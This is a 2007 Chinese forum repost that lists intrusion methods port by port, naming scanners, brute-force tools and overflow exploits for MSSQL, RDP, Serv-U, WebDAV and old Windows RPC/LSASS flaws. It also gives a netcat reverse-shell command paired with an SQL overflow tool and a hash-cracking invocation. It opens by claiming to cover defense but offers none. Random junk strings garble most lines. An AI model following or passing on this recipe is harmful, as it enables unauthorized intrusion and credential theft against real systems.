|
|
工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。
% X* Y( I) K/ v, q6 E. a
3 i4 J, k+ R! \/ {* y2 T+ d: ~( ]% B( y( X! R6 i
1. 1433端口入侵 - v1 t0 H" q/ w5 N
5 x% ` `8 Y9 J! e4 T scanport.exe 查有1433的机器 9 |' ~( U( B% [) b4 n# R2 F
! L- V" `4 a9 X6 A' O& k SQLScanPass.exe 进行字典暴破(字典是关键) * E5 }, a8 g% o* ]7 r+ ^9 T9 m
9 b( K$ b4 I8 K
最后 SQLTools.exe入侵 & N# g) `" u4 Z4 q6 ~
j2 j& \1 P: Q- l# h; f% U/ D ============================= * O/ J, s0 L$ o; e7 j
8 w2 ]6 D- O2 T' @- l/ F9 y+ T
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
0 s8 J/ b0 s8 w O0 p, q6 A3 f
1 m. s# W( C/ e5 J$ M nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 " L3 w$ u! |; {( A6 _4 @ o
! C. r, d2 F! [
(以上反向的,测试成功)
- }5 C. w) A: P6 r6 w0 g
7 J5 P2 e/ N$ M4 \( {3 k sqlhelloz.exe 入侵ip 1433 (这个是正向连接) 9 f+ c6 s+ J+ L# H3 O
5 i; Q- k2 {# b; Z+ V/ P/ u
2. 4899端口入侵 ! v& W F6 d) [; Z6 {8 b
/ c# u: Z; \. J' f 用4899过滤器.exe,扫描空口令的机器
9 O+ ^! i7 L' U$ m6 H5 R
; K2 G/ j& v5 g' A( W& S 3. 3899的入侵 9 N/ w$ o& D7 X p6 z/ N8 L+ Z
! d- g; M- ]4 L8 y# g2 x S 对很早的机器,可以试试3389的溢出(win3389ex.exe) 7 K! |! N' U2 g3 H# a
2 h! R! O9 k7 ?' p 对2000的机器,可以试试字典暴破。(tscrack.exe)
* N6 |# r- [ c, k$ y7 d, [ 3 R% ?$ }0 C$ k$ }5 P5 r
4. 80入侵 ' i7 L( R9 H3 o+ D# N
1 E$ u) n3 f/ [ 对sp3以前的机器,可以用webdav入侵;
* F: O& V* S, D$ A% |2 |
# J9 }4 e2 E3 j% Z 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
" _$ M2 P- f5 K3 ^
F% f6 l* f: W& `' ? 可以利用SQL进行注入。(小榕的注入软件)。
) ^: X' M3 h+ W# I; t2 }( W3 G$ D% \: @. e. r
5. serv-u入侵(21端口)
2 }5 c, f2 R* e3 M! @) m
5 C9 g' B. D; N2 J5 g; r1 a. O* F 对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
4 H( O) H6 X1 m1 K# J7 E# Y4 I0 Y4 z1 k
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe) - O+ L- ]# A7 P, p |
# }0 V1 l, c0 e0 `/ U( z N
======================================
" l4 s5 _+ R! w4 J
5 g: M# Z2 X6 b6 P9 L9 e( s 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) 8 p2 t# Z8 n, Q: b* \
6 }: h. s$ {* x c& q' J
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A
9 }! K1 J q; e: _) H- Y3 K7 p7 U, B 9 n3 q* p6 A2 w7 q
6. 554端口
2 [" `4 u" {6 E7 i. w
& F5 Y+ R% D) a7 z 用real554.exe入侵。
1 g5 m+ F5 K) } ; F/ g. r7 I4 u2 Z/ I
7. 6129端口
, y+ Y/ b. S5 S2 U( g! _6 I% [$ P
) p8 |# d K9 u% F4 G+ A. @ 用DameWare6129.exe入侵。 2 I( |- k/ j' }5 j% x, L
* ^, s _2 e4 \6 R$ {
8. 系统漏洞
3 v0 W4 `+ i4 ?% U. v+ @6 Z, [9 C' [, J. H) G# G/ z# T- c
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, & W* i3 ~; C- |
$ ~0 x$ L$ N! { @3 _+ `( T 进行溢出入侵。
- r5 Z* D: X! \" F( L1 f2 u
. l" [% f: H- ^# F! o4 F" g 9. 3127等端口
: a% R, G0 O& m) ?# B# I% @, f& X" \- z; w0 ^6 @# `
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
9 _" \- o% _! L/ {2 `# j; L5 L: B! ]& I2 w" y
10. 其他入侵
& q% l3 x: d- J. E$ v4 L3 X) k5 [+ k/ E6 Q# B& }/ X
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。' ~) H4 r9 H% v; T7 z
6 X) T2 l3 v5 I! m; F
| 转自杜松论坛:http://www.juniperbbs.net/index.php |
|
|
/1 
IP卡
狗仔卡
发表于 2007-12-17 01:04:27
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
